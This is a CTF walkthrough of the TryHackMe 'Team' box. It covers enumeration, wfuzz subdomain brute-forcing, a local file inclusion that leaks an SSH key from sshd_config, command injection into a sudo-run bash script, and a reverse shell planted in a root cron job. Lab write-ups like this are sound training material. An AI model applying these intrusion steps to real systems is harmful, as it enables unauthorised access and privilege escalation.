Team TryHackMe Walkthrough
Hello guys back again with another walkthough this time we’ll be tacking Team from TryHackMe. A beginner friendly box that teaches the importance of doing your enumeration well. It starts of by finding a virtual host(vhost) that leads you to a dead end(a bootstrap themed webpage). We decided to brute force subdomains using wfuzz and ended finding one other subdomain which is vulnerable to a file path traversal and a Local File Inclusion vulnerability. Doing some regular fuzzing we notice that a SSH private key has been hidden in plain site in sshd_config file. We download the key and use it to log into the box as the user Dale. Next we exploit a poorly coded bash script to escalate our privileges to the second user Gyles. And then edit a file which is executed via a cron job to get root on the box. A really nice box thanks to the creator of the box dalemazza. Without much say let’s jump in
As always we are going to start with an nmap scan of the box to find the ports that are open
Looking at the result you can see that we have three ports open FTP,SSH and HTTP
There really isn’t much information outputted by nmap concering FTP but to be thorough i always like to check for anonymous login.
And as you can see in the screenshot below Anonymous login isn’t allowed. But we maybe return an enumerate the FTP if we ever get any valid credential. SSH service requires a valid credentials to access and the previous version that had a user enumeration vulnerability has been obsolete for some time and probably no longer used meaning we’ll also keep SSH in our back pocket. I started by enumerating HTTP since we know that HTTP has a bigger attack surface.
Opening the web page using Mozilla we get the Apache default webpage
First thing i always to is to check the source of the page
Looking at the source code above you can see that the developer added a non standard line on the default web page and the line contains a hostname. I added the hostname to my hosts file
And navigated to the webpage using the hostname. Looking at the screenshot below we get a different web page
Meaning virtual host routing is enabled in the web application. I first decided to leave a gobuster running in the background. Gobuster is a Directory/file & DNS busting tool written in Go Gobuster is a tool used to brute-force URI’s including directories and files as well as DNS subdomains.
I ran two separate gobusters. One for the root webpage(Apache default webpage)
And the second on for the virtual host (team.thm) web page
While both gobusters were running in the background i decided to enumerate team.thm host manually. First i looked at the source code of the web application but nothing was out of the ordinary
But looking at the robots.txt file it exposed a potential username of one of the users
Seeing this i decide to use that username and try a SSH brute-force with hydra using the rockyou wordlist
While all the tasks were running in the background i had hit a dead end. The virtual hosts web page was just a default boot strap theme. But since we have a virtual hosts i decided to brute-force subdomains. The tool that i normally use to brute-force subdomains is wfuzz since am accustomed to it. The command used to bruteforce subdomain is
wfuzz -c --hw 977 -u http://team.thm -H "Host: FUZZ.team.thm" -w ~/Desktop/git/SecLists/Discovery/DNS/subdomains-top1mil
lion-5000.txt
Looking at the result from wfuzz we get one extra virtual host which i added to my hosts file
And tried to navigating to the virtual host again by using Mozilla and voila we have yet another webpage to enumerate
Clicking on the place holder link we see that it uses some sort of include to included the teamshare.php file
I intercepted the request with burpsuite and tried to checked for file inclusion vulnerability. I started by checking a default file which is found in any Linux distro the passwd file and looking at the screenshot below i was able to include it!!!
We now certain that the web application has a file inclusion vulnerability. With this vulnerability two things comes in mind:
- We may have to use that LFI vulnerability to get remote code execution though various methods eg. remote file inclusion, php wrappers(expect://,php://input) code execution, log poisoning, leaked phpinfo file etc.
- Utilize this vulnerability to read some sensitive files that will lead to us compromising the box
First i decided to run intruder(which is fuzzer build in to BurpSuite) with a wordlist to check for common files on Linux systems
Am using Burpsuite professional edition but if you using the community edition it will be much slower i recommend using wfuzz or ffuf for fuzzing
The wordlist i used was from Seclists.
SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txtAfter trying all the methods to get Code execution from Local File Inclusion and failed i decided to look though the fuzzing and found an interesting file
sshd_config
We get a SSH private key for the user Dale.
I copied the key to my box and edited to remove the pound signs and the gave it the write permission using the command
chmod 600 dale.keyAnd tried logging into the box using the key
Looking the the screenshot above we have a shell on the box.
Looking at the users home directory we have the users.txt file which we cn submit to tryhackme and get the points
Running sudo -l we see that we can run a particular bash script as the user Gyles
Looking at the script we see that there are three possible places where we can inject system commands on the script
I’ll be injecting in the error variable since we see that the variable is directly passed to a system call
Sweet now we have a shell as the gyles’ user. Looking at the user’s home directory we see that the author left the .bash_history meaning we can trace what the author did while he was creating the box
Looking through the file we see a file in /usr/local/share called main_backup.sh being edited
We also see some mention of crontabs meaning there might be a cronjob running
Looking at the file’s permission we see that its only writable by root and members in the admin group. And the gyles user is in the admin group as seen in the screenshot below meaning we have access to modify the file’s contents
Looking at the file with a vim text editor we see that it’s a bash script that copies some backups i decided to edit the file and add a reverse shell since i knew that there was a cronjob being executed
Next i did set up a netcat listener
And waited for a shell. After a few seconds i got a callback
We are the root user!!!.Looking at his home directory we have the root flag
I’d recommend running linpeas always since it make your job easier as a pentester or a CTF player since it does all the privilege escalation checks
Looking at the screenshot below we see that it found a writable bash script
We also see the process process
/bin/bash /usr/local/bin/main_backup.shbeing executed by root though a cron
If you liked the walkthrough, be sure to clap for me down below and don’t forget to follow me so that you don’t miss any upcoming articles. That’s it for now till next time it’s goodbye!!